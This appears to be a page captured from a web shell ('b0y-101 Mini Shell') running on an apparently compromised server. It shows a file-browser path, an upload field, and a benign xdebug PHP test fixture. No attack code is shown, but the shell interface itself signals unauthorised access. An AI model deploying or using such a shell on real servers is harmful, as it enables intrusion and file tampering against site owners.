b0y-101 Mini Shell


Current Path : E:/www/b-group.old/spfin - Copy/testpayment/src/xdebug/tests/coverage/
File Upload :
Current File : E:/www/b-group.old/spfin - Copy/testpayment/src/xdebug/tests/coverage/bug01932.inc

<?php

namespace Service;

class Example
{
    public function executeAction(): bool
    {
        $path = $this->getBasicPath()
            . '/'
            . $this->getFileName();

        return $this->runAction($path);
    }

    private function getBasicPath(): string
    {
        return '/var/www';
    }

    private function getFileName(): string
    {
        return 'file.csv';
    }

    private function runAction(string $path): bool
    {
        return true;
    }
}

Copyright © 2019 by b0y-101